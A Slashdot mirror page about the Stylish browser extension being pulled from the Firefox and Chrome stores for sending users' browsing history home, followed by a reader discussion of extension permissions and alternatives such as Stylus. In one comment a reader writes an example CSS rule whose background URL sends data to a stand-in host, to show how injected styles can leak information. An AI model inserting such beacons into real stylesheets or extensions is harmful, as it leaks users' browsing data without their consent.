Slashdot Mirror

← Back to Stories (view on slashdot.org)

Firefox and Chrome Pull Popular Browser Extension Stylish From Their Stores After Report Claimed It Logs and Shares Browsing History, Credentials

Posted by msmash on from the end-of-road dept.

sombragris writes: Stylish, a popular extension available for Chrome and Firefox which allows for easy customization of any website, now phones home and shares its users' browser history with its corporate parent, according to blogger Robert Heaton. This prompted Firefox to ban the extension from its addons site and prompt all users to disable it. The discussion can be seen in the relevant bug report. In Heaton's words:

Stylish is no longer a well-meaning product with your best interests at heart. If you use and like Stylish, please uninstall it and switch to an alternative like Stylus, an offshoot from the good old version of Stylish that works in much the same way, minus the spyware.

Google too has pulled the extension from its extension store. This is not the first time Stylish is at the centre of a privacy debacle

68 comments

  1. Bad - but not surprising or unexpected by Anonymous Coward · · Score: 5, Insightful

    We now live in "The Internet Economy" where everything is based on "monetizing" the customer.

    1. Re: Bad - but not surprising or unexpected by Anonymous Coward · · Score: 0

      And that's why advertising is the worst thing that happened to the internet.

    2. Re: Bad - but not surprising or unexpected by Anonymous Coward · · Score: 0

      It is the worst thing happened.

    3. Re: Bad - but not surprising or unexpected by Anonymous Coward · · Score: 0

      Chill, nobody died.

    4. Re:Bad - but not surprising or unexpected by Anonymous Coward · · Score: 0

      What else would you monetize? Have you paid for content, or do you simply consume it? Have you paid for a browser extension?

    5. Re: Bad - but not surprising or unexpected by Anonymous Coward · · Score: 0

      Chill, nobody died.

      Nobody, died, true. Just some identities were sold or stolen and some web accounts compromised. What's the big deal? No blood, no foul, right?

  2. We need an extention protection mechanism by xack · · Score: 3, Informative

    Extentions need to be protected. We need to have a last known good backup system in place for extentions at risk of being hijacked.

    1. Re:We need an extention protection mechanism by Luthair · · Score: 3, Insightful

      Not sure what one can really do, if a developer willing gives away the keys to the extension.

    2. Re:We need an extention protection mechanism by Anonymous Coward · · Score: 0

      No, we need better permissions on everything. The OS should prompt the user for each new permission and area/service a program wants to use and software with plug-ins should do the same with each plug-in*. Your choices: allow, deny, fake. Checkbox: once/always.

      Similar to phones, but far more fine grained for those who wish it. I know there's SELinux, I also have no clue how to set it up. The feature should be automatically blacklisting everything, like the firewall ZoneAlarm did. Install that and it annoying alerted on everything, but it was easy to quickly allow what was needed.

      *So we need a guide on how to wrap up API calls inside a permissions framework. Any takers? Any recommended reading? I need to write a plug-in supporting piece of software in the future...

    3. Re:We need an extention protection mechanism by cheesyweasel · · Score: 1

      Maybe extensions should be digitally signed like apps are with gatekeeper on osx, or authenticode on windows?

    4. Re:We need an extention protection mechanism by Waccoon · · Score: 3, Insightful

      While we're at it, could we also have a mechanism to override auto-updating? It sucks when a developer sells his extension, and then everything auto-updates to the all-new system without appropriate disclosure. One of many reasons I don't want ANYTHING to auto-update anymore.

    5. Re:We need an extention protection mechanism by Anonymous Coward · · Score: 3, Informative

      If you're on Firefox, go to about:config and flip "extensions.update.autoUpdateDefault" to "false". You can also change this per-extension by clicking on the "More" link on each extension. The first field is "Automatic Updates" and you can choose between Default, On, and Off.

    6. Re: We need an extention protection mechanism by Anonymous Coward · · Score: 0

      You could learn how to spell extension.

    7. Re:We need an extention protection mechanism by AHuxley · · Score: 1

      The browser gets an outgoing firewall for the extension? That looks like too much data getting uploaded? Tell the user that an encrypted network was established beyond what was needed for the extension update request?

      --
      Domestic spying is now "Benign Information Gathering"
    8. Re: We need an extention protection mechanism by houghi · · Score: 1

      What os "too much"'? What if I want ot to do that what it does?

      --
      Don't fight for your country, if your country does not fight for you.
    9. Re: We need an extention protection mechanism by AHuxley · · Score: 1

      Some standard framework for what an extension can do? Request a version number?
      More data moving out would need user agreement and browser support?
      Make the browser much more aware of what its extensions can do and what more they are allowed to do.

      --
      Domestic spying is now "Benign Information Gathering"
    10. Re:We need an extention protection mechanism by jbmartin6 · · Score: 1

      Given how browsers have become the primary application for so much sensitive information, I advise people to treat extensions the way they (should) treat any other unknown application. And disable automatic updates. But truth be told most people won't do that because it is a pain.

      --
      This posting is provided 'AS IS' without warranty of any kind, implied or otherwise.
    11. Re: We need an extention protection mechanism by JackieBrown · · Score: 1

      And then we can complain that browsers are limiting what extensions can do (like the complaints firefox gets.)

      This is just one of the risks you take when you install an extension. It's up to you to decide if what the extension does is worth the risk.

      I'm down to using almost no extensions and just using my host file to block domains.

    12. Re: We need an extention protection mechanism by Anonymous Coward · · Score: 0

      I'm sure there's an extension for that.

  3. Sad by Stan92057 · · Score: 1

    What sad is many will say me included at one time ya get what ya pay for so them become scummy isn't a surprise. The problem is even if you PAY for a product take Windows 10, ya it was free but its not free anymore and the paid version is no different then the unpaid version. All the spyware,data mining,loss of control over ones own setting and program choices are in the PAID version. The one that may allow users to fully control isn't sold to the general public. Point is, paying for stinking product don't exclude the data spying you kinda expect from Free crap. We need to get off our lazy butts and start putting pressure on congress to get back the privacy that was taken from us and ya we allowed them.

    --
    Jack of all trades,master of none
    1. Re: Sad by Anonymous Coward · · Score: 0

      Windows 10 is still free: https://www.microsoft.com/en-us/software-download/windows10ISO

      Doesn't expire, but you can't change the wallpaper.

  4. old news... by Anonymous Coward · · Score: 0

    from january 2017:

    https://www.bleepingcomputer.c...

    there was an opt-out setting then.. is there still today?

    even still, the 'anonymous data' they're collecting isn't exactly anonymous

  5. But how bad? by Anonymous+Brave+Guy · · Score: 5, Interesting

    The title suggests that not just browsing history but credentials are uploaded. The latter is potentially much worse than the former. Does anyone have verifiable data on exactly what was uploaded? Does everyone who got caught out by this need to reset their IDs/passwords/whatever on every site they visited while using the extension? Or every site they've ever visited and allowed their browser to store login credentials?

    The new owners could be in pretty deep brown stuff anyway given that this sort of behaviour without explicit consent is now very illegal throughout Europe, but if they were stealing credentials then it would be prudent to reset everything, which of course could mean dozens or hundreds of different sites for some people.

    --
    If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
    1. Re:But how bad? by Anonymous Coward · · Score: 0

      Aren't extensions just Javascript? If you really like the extension (I don't use it myself) couldn't someone knowledgeable with Javascript just edit out the spyware?

    2. Re:But how bad? by Anonymous+Brave+Guy · · Score: 1

      That's essentially what happened with alternatives like Stylus that are now being recommended instead. What we can't figure out so easily is the past behaviour of all relevant versions of the Stylish extension itself.

      --
      If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
    3. Re:But how bad? by Anonymous Coward · · Score: 2, Interesting

      The "credentials" part of the title is misleading.

      Stylish sends our complete browsing activity back to its servers, together with a unique identifier. [] The SimilarWeb Privacy Policy says that they only collect “non-personal” data, and I assume that this is technically true.

      There is only evidence that Stylish sends home browsing history, but TFA discusses how visited URLs may contain credentials or one-time keys, and how Stylish can link them to a userstyles.org account.

    4. Re:But how bad? by Anonymous Coward · · Score: 0

      The "credentials" are those contained in the site URLs such as unique token identifiers.

      They also sent your google searches (don't know about bing and other search engines)

    5. Re:But how bad? by Anonymous Coward · · Score: 0

      The title suggests that not just browsing history but credentials are uploaded. The latter is potentially much worse than the former. Does anyone have verifiable data on exactly what was uploaded?

      According to TFA, the full URL including query string of every site you visit (or your browser pre-fetches).

      Some of these URLs (such as every confirmation e-mail ever) puts the authentication in the query string. That's how authentication gets included.

    6. Re:But how bad? by Anonymous+Brave+Guy · · Score: 1

      I saw that as well; that was what prompted my question. Any sanely implemented site isn't going to be sending things like plain text IDs and passwords as part of a query string, only one-time tokens and the like. It was whether Stylish was intercepting things like form submissions over HTTPS, or somehow scanning saved login credentials stored in the browser, that I was concerned about when I read the title. That would have suggested that users should be advised to change all of those passwords.

      --
      If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
    7. Re:But how bad? by thsths · · Score: 1

      Indeed - the later would be criminal in most legislations around the world. There is nothing brown about it, it is a clear black hat activity.

    8. Re:But how bad? by Anonymous Coward · · Score: 0

      Any sanely implemented site isn't going to be sending things like plain text IDs and passwords as part of a query string

      And, yet, we time and time again see that the people who build websites (and make most internet connected devices) prove to be incompetent morons who know nothing at all about security.

      So would you really be surprised if this was happening?

      I sure as hell wouldn't, because I'm no longer willing to give the benefit of the doubt to corporations, because far too often it's Marketing and the idiots with MBAs making the decisions. In my experience, both of those groups are lying sacks of shit who can't be made to understand reality.

      Oh, and for anyone in marketing or who has an MBA who is offended ... I don't give a fuck. I have way too much real world experience to believe otherwise.

    9. Re:But how bad? by Anonymous Coward · · Score: 0

      By "in deep brown stuff", he clearly meant they could be in deep shit for this, not referring to the metaphorical colour of hat they might be wearing.

  6. We need to not keep trusting everyone's software by Anonymous+Brave+Guy · · Score: 4, Interesting

    There is a plague in the modern tech industry, where everything from browser extensions to microlibraries for your favourite programming language is written by someone you've never met, supplied via some sort of centralised repository or distribution channel that you trust instead, and then winds up on your machine doing who-knows-what because that trusted distribution mechanism missed something, or even because the trusted developer of some code you're running, which you downloaded via a trusted source, itself trusted someone else unwisely.

    The solution to this isn't just proper validation of where the code you're downloading actually came from, it's also to have security models more sophisticated than the 1980s in the Internet age. For example, why the hell could a browser extension that was there to modify the appearance of pages you were visiting suddenly choose to upload anything to the mothership without requiring additional permissions?

    --
    If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
  7. Why install that garbage by Anonymous Coward · · Score: 0

    Just get those website themes through userscripts.

  8. Spot the blame-jumping by Anonymous Coward · · Score: 0, Insightful

    Sure, this is clearly a shitty thing for an extension to do - but the real blame lies squarely with the FF devs. On what fscking planet is there justification for ALLOWING an extension to access history in the first place?! They were perfectly happy to permanently break thousands of legitimate and useful extensions a year ago by refusing to support existing functionality in the "new" APIs, but utter retardedness like this passed their "merit" test?

    (For the Chrome devs it's understandable, since the entire point of that browser is to spy on users in the first place).

    1. Re:Spot the blame-jumping by jaa101 · · Score: 2, Insightful

      the real blame lies squarely with the FF devs.

      Wrong.

      On what fscking planet is there justification for ALLOWING an extension to access history in the first place?!

      For examples, try searching for Firefox extensions involving history.

      Maybe there needs to be some kind of permissions system for extensions so that the user is prompted to grant access to things like history, credentials, form fields, user key-strokes, etc. Until there is, understand that you need to trust your extensions just as much as you have to trust the browser itself. This shouldn't be a surprise to anyone.

    2. Re:Spot the blame-jumping by Anonymous Coward · · Score: 2, Informative

      Maybe there needs to be some kind of permissions system for extensions so that the user is prompted to grant access to things like history, credentials, form fields, user key-strokes, etc.

      There is. That's part of the new extension system. The concept of permissions is fundamentally at odds with the old extensions system and was one of reasons for the new extension system.

      Unfortunately, as pointed out elsewhere in this thread, there's no way to implement Stylish such that it doesn't have the rights to leak every URL you visit, since it can just add extra CSS that sends that information back via loading an image on its remote server. Of course, uMatrix or similar could block such a thing, but that's definitely a tool for advanced users.

    3. Re:Spot the blame-jumping by Raphael · · Score: 1

      Sure, this is clearly a shitty thing for an extension to do - but the real blame lies squarely with the FF devs. On what fscking planet is there justification for ALLOWING an extension to access history in the first place?!

      Your criticism is misdirected. Stylish does not need to access your browsing history (something that Firefox can block). But Stylish is designed to be active on every page that you visit so that it can apply custom styles for that site or tell you if some user styles exist for that site, Stylish sees every page that you visit, so it can collect and transmit its own view of your history. And unfortunately, that history can include some sensitive information as explained in the article.

      --
      -Raphaël
  9. Re:We need to not keep trusting everyone's softwar by Anonymous Coward · · Score: 0

    For example, why the hell could a browser extension that was there to modify the appearance of pages you were visiting suddenly choose to upload anything to the mothership without requiring additional permissions?

    Because of the way css works.

    Consider something like "background: url('https://back.home?sent=with&cookies=yes')".

    The separation between content and presentation in html is mostly posturing; in order to modify the appearance of a page, you need access to everything.

  10. Good! by Anonymous Coward · · Score: 0

    May the developers rot. Scum bags!

  11. Free is never free by Anonymous Coward · · Score: 0

    None of this is shocking, many of these developers of these extensions want to recoup their time and effort somehow. Maybe we all need to start realizing free is never free and collection of data and information in return for something is payment

  12. Why do people do this? by Frosty+Piss · · Score: 1

    Why do companies / people do this when there is *100 percent chance* that they will be discovered and excommunicated from the Internet Universe? One would think they would be a little more sneaky about it.

    --
    If you want news from today, you have to come back tomorrow.
    1. Re: Why do people do this? by Anonymous Coward · · Score: 0

      Because it took a while for 'his to come to light and they made millions

    2. Re: Why do people do this? by rojash · · Score: 1

      Proof ? And as long as these fucking browsers have these holes, we might as well bend down while browsing.

  13. Use Stylus Instead by Anonymous Coward · · Score: 1

    As the summary notes, stylish has been suspicious for a while. I switched to stylus last time and have been more than happy with it.

  14. Re:We need to not keep trusting everyone's softwar by Anonymous+Brave+Guy · · Score: 1

    Yes, you can do all kinds of things if the browser lets you. But there is no reason a browser couldn't simply impose a 100% firewall by default and let any extensions that genuinely do have a need to do something like your example ask for explicit permission. I would argue that the sort of behaviour you illustrated is relatively unusual for browser extensions, while sadly trying to exfiltrate data no longer is.

    --
    If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
  15. If you were using stylish on Firefox.... by gerald.edward.butler · · Score: 5, Informative

    I was using stylish for quite some-time. I'm disappointed that this kind of breaking of trust occurred with that extension. I've now switched over to stylus instead. It works great (even better than stylish). It seems to behave better, have a better UI, and more stability. So, if you're unsure what to use, definitely give stylus a try.

    1. Re:If you were using stylish on Firefox.... by Anonymous Coward · · Score: 0

      Thanks!

    2. Re:If you were using stylish on Firefox.... by Anonymous Coward · · Score: 2, Informative

      Can confirm, Stylus works just as well. No modification of my styles were needed.

  16. Re:We need to not keep trusting everyone's softwar by Anonymous Coward · · Score: 0

    False. Stylish and its ilk do nothing but insert CSS. Browsers can implement an official API point for such functionality and sandbox it if needed. If you really need access to everything to inject CSS, it shows that the browser and permissions API isn't designed well enough.

    Firefox, at least, still offers ye olden userStyle.css. The code is there; why not spruce it up a bit and make it an API call that has to go through the permission process? The only piece of information such an extension needs is the URL that you're visiting, so it can find and inject the CSS that you want on that page. Anything beyond that is asking for too much information. And it shouldn't be sending that data anywhere.

  17. Re:We need to not keep trusting everyone's softwar by stoborrobots · · Score: 1, Interesting

    As the grandparent pointed out, you haven't solved anything.

    Even if the plugin is only allowed to insert valid css into the page, it can send information back to any site on the internet, by using css properties which take url values, including background. The ability to send data to an arbitrary server is implicit in the ability to inject css into a page.

    --
    "Go to CNN [for a] spell-checked, fact-checked summary" -- CmdrTaco
  18. Stylish still exists? We moved on years ago, fam by kriston · · Score: 1

    Stylish still exists? We moved on years ago to Tampermonkey.

    --

    Kriston

  19. Bigger deal than what Facebook's doing by Chameleon+Man · · Score: 2

    People are concerned with the Cambridge Analytica stuff, where an app scrapes essentially publically-made data of users, but browser extensions are far scarier. If granted the right permissions, they have free reign on scraping password data. I imagine far more extensions are doing it.

  20. Thank you! by Anonymous Coward · · Score: 0

    Next time someone asks me why I'm still using Opera 11 and tries to argue that I could get most of the features it has that modern browsers don't have through extensions, I now have another good reason to point out!

  21. Re:Stylish still exists? We moved on years ago, fa by aloniv · · Score: 1

    Are you sure you aren't confusing Stylish with Scriptish?

  22. Re:Stylish still exists? We moved on years ago, fa by Anonymous Coward · · Score: 0

    Stylish is a theme extension for theming websites and browsers (when they allow it) you dumbo.
    What you meant to say is Stylus or whatever else exists, not a script management addon.

  23. Re:We need to not keep trusting everyone's softwar by Anonymous+Brave+Guy · · Score: 1

    This is true if you allow insertion of arbitrary CSS (or running of arbitrary code that can trigger requests via JS etc.) and then process it with no questions asked. However, browsers already deal with related concerns in areas like the same-origin policy and CORS. They could apply similar safeguards to locally generated requests.

    --
    If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
  24. Peer review by thePsychologist · · Score: 1

    Someone needs to start a peer-review system for firefox extensions.

    The other day I installed a gestures extension and reviewed the source code myself before installing it for possible telemetry leaking. I didn't have any and it would be nice to upload my results to a website.

    If someone made it nice like stackexchange with points I bet it would take off.

    --
    "What lies behind us, and what lies before us are tiny matters compared to what lies within us." Ralph Waldo Emerson
    1. Re:Peer review by aaron44126 · · Score: 1

      I can only imagine that this would start a game, wherein nefarious add-on makers would create fake accounts to use to post positive peer reviews of their extension... There would have to be some kind of trust mechanism included and I'm not sure how that would work.

    2. Re:Peer review by JackieBrown · · Score: 1

      Nope. It's easy to game an extension but a review system? Impossible! lol

    3. Re:Peer review by JackieBrown · · Score: 1

      I think it reflects pretty poorly on Chrome how most of the comments are about show we are shocked that this could happen on Firefox. I guess we just took it for granted that it would happen using Chrome.

  25. Legal system by MobyDisk · · Score: 1

    Is this not a crime? Who perpetrated it? Or did everyone who installed the extension agree to a EULA explaining that it did this? If so, I believe the problem is the existence of a EULA. They are too long and complex, nobody reads them, and so they have all kinds of stuff in them. Since people agree to them automatically, they lose their rights to use the legal system that should be punishing these criminals.

    1. Re:Legal system by Anonymous Coward · · Score: 0

      So if it isn't in the EULA, it is wrong. If it is in the EULA, it is wrong. Correct? Praytell, is there ANY way to be right?

  26. Stylus alternative for Stylish, but styles site? by Anonymous Coward · · Score: 0

    The problem now is an alternative to the theme website userstyles.
    The new owners of Stylish, apart from doing the shit they are doing now, overhauled the userstyles UI and made it worse.
    Broke search, broke search result system, broke thumbnails for a period, made it look shit.
    Core point: Site which provide a system and a library of themes to theme websites to fix those shitty UI, change to preferred UI schemes, or improve UI;
    instead overhauls itself and breaks everything and does a poorer job at UI than the majority of the userbase which provides themes for other sites.
    Think about this for a second.

    Also Userstyles tries to force the installation of the new spyware-ridden Stylish version (Stylish post-2.0.7 on Firefox) when you try to install styles for websites,
    forcing users to manually install those styles and abandon the style update function.
    So a centralized and Stylus-connected alternative to userstyles is also badly needed.

  27. Re:Stylish still exists? We moved on years ago, fa by kriston · · Score: 1

    Nope, Tampermonkey et.al are supersets of the functionality provided by Stylish.

    --

    Kriston